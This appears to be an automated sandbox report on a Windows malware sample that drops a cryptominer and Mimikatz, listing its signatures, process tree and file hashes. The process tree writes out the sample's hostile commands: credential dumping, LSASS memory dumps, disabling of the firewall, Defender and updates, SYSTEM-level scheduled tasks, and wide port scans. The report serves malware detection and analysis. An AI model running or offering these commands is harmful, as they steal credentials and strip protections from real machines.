Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
05-08-2024 12:33
General
-
Target
8e065bda3d6123b22bdd0e98724a1480N.exe
-
Size
8.9MB
-
MD5
8e065bda3d6123b22bdd0e98724a1480
-
SHA1
96b3032bed31c798f7502f890fa746df4e46ec8b
-
SHA256
fd50d4adffef53d86264cf912253da4cd8590855355a63d40e1c4ac91b90a2c2
-
SHA512
a8b4ed66e5e5806f14599aebc3edf71a998beaa5ce6e2ce606b36feabe9bdbfd8a6ec262449083eefbe83efa1507d6cb15d22d3a7d445e235c23572733d532c6
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (15345) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 9 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 25 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 31 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 39 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\qzebsiybv\bnidgq.exe"C:\Windows\TEMP\qzebsiybv\bnidgq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\8e065bda3d6123b22bdd0e98724a1480N.exe"C:\Users\Admin\AppData\Local\Temp\8e065bda3d6123b22bdd0e98724a1480N.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\znrgncrv\emzriir.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exeC:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exeC:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kgkufnrnc\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\kgkufnrnc\Corporate\vfshost.exeC:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 768 C:\Windows\TEMP\kgkufnrnc\768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 64 C:\Windows\TEMP\kgkufnrnc\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2172 C:\Windows\TEMP\kgkufnrnc\2172.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2628 C:\Windows\TEMP\kgkufnrnc\2628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2804 C:\Windows\TEMP\kgkufnrnc\2804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2868 C:\Windows\TEMP\kgkufnrnc\2868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3208 C:\Windows\TEMP\kgkufnrnc\3208.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3904 C:\Windows\TEMP\kgkufnrnc\3904.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3996 C:\Windows\TEMP\kgkufnrnc\3996.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 4064 C:\Windows\TEMP\kgkufnrnc\4064.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 680 C:\Windows\TEMP\kgkufnrnc\680.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 1944 C:\Windows\TEMP\kgkufnrnc\1944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 4012 C:\Windows\TEMP\kgkufnrnc\4012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 1884 C:\Windows\TEMP\kgkufnrnc\1884.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 1356 C:\Windows\TEMP\kgkufnrnc\1356.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\kgkufnrnc\uhbggiaeb\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\kgkufnrnc\uhbggiaeb\bbqlvcqnq.exebbqlvcqnq.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\xchlyg.exeC:\Windows\SysWOW64\xchlyg.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\emzriir.exe1⤵
-
C:\Windows\ime\emzriir.exeC:\Windows\ime\emzriir.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
7.7MB
MD5a6d35c1047cb3a246da6db84f984ea8d
SHA17315fd1813621eeb8f09d7f37cd4a1688bec44db
SHA2561f917882ea1eb5e835e5280ccacc4fd76410cc0eb30df020c90d81692071c613
SHA5126ca5a114b9f72d9fe4c2ea758edf06f0c267841621bc65de39f6ccf4800a734f5d3f25bf2a56967823024f1c57f14cad40fe6fd38a48e6006f307de39c240a12
-
Filesize
8.6MB
MD50e0f5d87b33a80be10361d81578e5267
SHA13041b9e645ebd42ea7c3efcfe84dfe9b1b8306c8
SHA256900d8ccfee038c5ab5a25deb5cb43dbc7f7d4c35e19ecf3e11c49a01d1f00112
SHA512037563209b2b768ead1ba5475c70b3da5edf58c46a01618c43ea6347e283b0b1c7bc6b9c2adf5242172c8ab66e980c39b452279601e7b2f9d8932b7a74c56253
-
Filesize
26.0MB
MD5247cb4556f82b999a9632aa10dc4756b
SHA1f2a7c6e48c1a8bee8c56971f8c133a7fc53bf2d9
SHA256837f14dd7a71fccc9b598e01efb04f8b115c4bf28cac1770016270087143a2d9
SHA512997b3f12687004e7fc8cc1176662cf29fd9ba24f31f3a7eef20d8e3eea4d973908344f3852a2062b2e3fe076c4f206e77d1ef70855cd8f3327f15e90efae20a1
-
Filesize
4.2MB
MD515e22507c8421367debb180a436f92be
SHA15a2f66ecc1d34085629e0aeaca39a82837b59739
SHA25607312c6e50a0aa53976893947e29a69f7d2d7dc813baaa06371f51b1b1a71c3c
SHA512a733f5fdef9aca63f6c1a87eb2c74309cec33d0fea3c7c3cc069c7308d3af9204816828c80997308d769a8b89cb0e960d7125931b7bc04fa2a9999db6fe79f86
-
Filesize
3.7MB
MD5305412a32c04efe98f7929da81edb765
SHA17e515aa473eb2c8662bae21c3b37ccf630c5361e
SHA256e709f2f6c4da53c8727e5326e30ecce8fbeba0484096264fd5a8828a152f4ee0
SHA5120218be569fb910802dd6c7fac67dc5b739a1a08a707be38baef1f80353e04c99467ed6e0fc260460ad0211610e92729ed753682f38656434f8de044011861d8b
-
Filesize
3.0MB
MD5415579c097382a80bf402c39a7f4102d
SHA1af203e3aeef763e195b56fcc0427a6bb8ced0893
SHA256a61ef107cebd2c781b68db2dbeabd855085d94fce23aa6973ed7fb875960532e
SHA51208266d074ae45c2cd2ae57fa8c2f80a621d31899f701ba53771e2b809da294d6cf7b165daabc32c98f9fc07a36a850c8a10c8b9279be952805b8432c48a84be2
-
Filesize
7.6MB
MD5f9beab1aa842fd946b5f0f3458f69953
SHA168d8c714b90ce8f87947d0648812e186de8635e9
SHA256960018f7b346d49a3f5f3a6c01f4f94fcbed8c92bd2cacdcff0c98961d8f9eff
SHA5123a31fe4fcbb874c07256fe7edae04f770dc558f30220f765fa9ac1c72b9a6136a6b73cd716aa8fdabba89b09e57d25076b0e44238052ad58e6c2f36d41ca7b86
-
Filesize
814KB
MD5b4d54069a8f969e459dea350f74140ac
